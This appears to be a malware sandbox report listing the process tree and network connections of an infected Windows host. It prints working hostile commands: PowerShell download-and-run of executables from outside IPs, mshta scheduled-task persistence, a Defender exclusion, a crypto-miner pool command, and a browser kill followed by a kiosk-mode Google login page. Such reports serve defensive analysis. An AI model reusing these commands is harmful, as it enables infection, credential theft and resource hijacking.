| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn XeMacmaJDcd /tr "mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn XeMacmaJDcd /tr "mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
"C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C251.tmp\C252.tmp\C253.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn cS853maNMMf /tr "mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn cS853maNMMf /tr "mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
"C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgq0aj3o\zgq0aj3o.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES119A.tmp" "c:\Users\Admin\AppData\Local\Temp\zgq0aj3o\CSCF0F5354ECBDC4CB8ABF25013C7A2A43.TMP"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "TYIbymaKsFJ" /tr "mshta \"C:\Temp\Y3xqvQ15g.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\Y3xqvQ15g.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\gmwu\wtrpqgw.exe
C:\ProgramData\gmwu\wtrpqgw.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe
"C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\xLUFfgfR\Anubis.exe""
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe
"C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe"
C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe
"C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3836 -ip 3836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 812
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe
"C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4384"
C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe
"C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe
"C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4384"
C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe
"C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe"
C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
"C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe"
C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe
"C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 27490 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e4da8b1-1917-48f8-8471-c9d4026ec0ea} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 28410 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24a83a43-be66-4ac1-b59d-ee0f9412b728} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3196 -childID 1 -isForBrowser -prefsHandle 3188 -prefMapHandle 3184 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f5316dc-602e-4628-b280-8aaf8196ae20} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 32900 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0c3d3f6-51aa-4537-b6ae-6c478898c3e0} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe
"C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4928 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4880 -prefMapHandle 4764 -prefsLen 32932 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18f7a36f-15c3-43fd-9335-6c8ad02b5c0b} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5048 -childID 3 -isForBrowser -prefsHandle 4944 -prefMapHandle 4956 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dab1ff2-857a-452f-8cf6-47ea9cfc5996} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5256 -childID 4 -isForBrowser -prefsHandle 5268 -prefMapHandle 5272 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8faeb7e1-521b-46fe-baeb-4c27939b5db0} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5316 -childID 5 -isForBrowser -prefsHandle 5304 -prefMapHandle 5252 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48cc90ae-2856-44bc-9aff-ffdad01804bc} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4384"
C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4384"
C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.154.98.175:6969 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 192.248.189.11:443 | pool.hashvault.pro | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.48.1:443 | croprojegies.run | tcp |
| US | 104.21.48.1:443 | croprojegies.run | tcp |
| US | 104.21.48.1:443 | croprojegies.run | tcp |
| US | 104.21.48.1:443 | croprojegies.run | tcp |
| US | 104.21.48.1:443 | croprojegies.run | tcp |
| US | 104.21.48.1:443 | croprojegies.run | tcp |
| US | 104.21.48.1:443 | croprojegies.run | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| N/A | 127.0.0.1:64350 | tcp | |
| N/A | 127.0.0.1:64362 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.73:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r2---sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2---sn-aigl6ns6.gvt1.com | tcp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.152.202:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.152.202:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.152.202:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.152.202:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.152.202:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.152.202:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | smtp.odyesy.com | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | academyli.org | udp |
| US | 8.8.8.8:53 | barracudarma.rma.ac.be | udp |
| US | 8.8.8.8:53 | smtp.becgrup.com | udp |
| US | 8.8.8.8:53 | mx.jk.locaweb.com.br | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| BR | 200.234.204.130:465 | mx.jk.locaweb.com.br | tcp |
| US | 104.17.67.73:465 | academyli.org | tcp |
| BE | 193.190.204.80:587 | barracudarma.rma.ac.be | tcp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | esdrfaxcir.co.cc | udp |
| US | 8.8.8.8:53 | out.f-consulting.de | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | chimkent.kz | udp |
| US | 8.8.8.8:53 | sanjoserosario.com.ar | udp |
| US | 8.8.8.8:53 | secure.raj.freeuk.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| GB | 195.8.66.22:2525 | secure.raj.freeuk.com | tcp |
| US | 8.8.8.8:53 | seznam.cz | udp |
| US | 8.8.8.8:53 | out.utopiasdawn.com | udp |
| US | 8.8.8.8:53 | smtp.comcast.net | udp |
| KZ | 91.201.215.38:465 | chimkent.kz | tcp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 35.91.2.62:25 | esdrfaxcir.co.cc | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | mx1.mail.ovh.net | udp |
| US | 8.8.8.8:53 | mx-10.au-east.atmailcloud.com | udp |
| US | 8.8.8.8:53 | mail.brandremedy.com | udp |
| US | 8.8.8.8:53 | trolbrinquedos.com.br | udp |
| US | 96.102.18.196:587 | smtp.comcast.net | tcp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| AR | 200.58.112.155:587 | sanjoserosario.com.ar | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| FR | 188.165.36.237:587 | mx1.mail.ovh.net | tcp |
| AU | 13.210.237.100:2525 | mx-10.au-east.atmailcloud.com | tcp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | tcp |
| GB | 84.9.158.101:25 | mail.brandremedy.com | tcp |
| US | 8.8.8.8:53 | bps.k12.nm.us | udp |
| US | 8.8.8.8:53 | out.aergf.srg | udp |
| US | 8.8.8.8:53 | petsouk.in | udp |
| US | 8.8.8.8:53 | alt2.aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | trussardi-it.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | secure.kdurango.fr | udp |
| NL | 52.101.73.2:25 | trussardi-it.mail.protection.outlook.com | tcp |
| FI | 142.250.150.26:25 | alt2.aspmx.l.google.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
